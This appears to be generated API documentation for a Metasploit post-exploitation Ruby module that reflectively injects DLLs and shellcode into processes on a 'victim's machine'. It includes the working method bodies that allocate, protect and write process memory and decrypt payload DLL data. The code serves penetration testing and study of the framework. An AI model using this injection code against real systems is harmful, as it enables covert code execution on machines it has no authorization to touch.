Module: Msf::Post::Windows::ReflectiveDLLInjection

Includes:
ReflectiveDLLLoader
Included in:
Process
Defined in:
lib/msf/core/post/windows/reflective_dll_injection.rb

Overview

This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim’s machine.

Constant Summary

PAGE_ALIGN = 1024

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 16

def initialize(info = {})
  super(
    update_info(
      info,
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_sys_process_memory_allocate
            stdapi_sys_process_memory_protect
            stdapi_sys_process_memory_write
          ]
        }
      }
    )
  )
end

#inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Reflectively inject a reflectively-injectable DLL, supplied as in-memory DLL data rather than a file path, into the given process.

Parameters:

Returns:

  • (Array)

Tuple of the allocated memory address and the offset to the ReflectiveLoader function.



# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 80

def inject_dll_data_into_process(process, dll_data, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  decrypted_dll_data = ::MetasploitPayloads::Crypto.decrypt(ciphertext: dll_data)
  offset = load_rdi_dll_from_data(decrypted_dll_data, loader_name: loader_name, loader_ordinal: loader_ordinal)
  dll_mem = inject_into_process(process, decrypted_dll_data)

  return dll_mem, offset
end

#inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER) ⇒ Array

Reflectively inject a reflectively-injectable DLL, loaded from the given file path, into the given process.

Parameters:

Returns:

  • (Array)

Tuple of the allocated memory address and the offset to the ReflectiveLoader function.



# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64

def inject_dll_into_process(process, dll_path, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
  dll, offset = load_rdi_dll(dll_path, loader_name: loader_name, loader_ordinal: loader_ordinal)
  dll_mem = inject_into_process(process, dll)

  return dll_mem, offset
end

#inject_into_process(process, shellcode) ⇒ Integer

Write the given shellcode into newly allocated memory in the target process; the allocation size is rounded up to a multiple of PAGE_ALIGN before the memory is allocated, protected and written.

Parameters:

Returns:

  • (Integer)

    Address of the shellcode in the target process's memory.



# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 41

def inject_into_process(process, shellcode)
  shellcode_size = shellcode.length

  unless shellcode.length % PAGE_ALIGN == 0
    shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
  end

  shellcode_mem = process.memory.allocate(shellcode_size)
  process.memory.protect(shellcode_mem)
  process.memory.write(shellcode_mem, shellcode)

  return shellcode_mem
end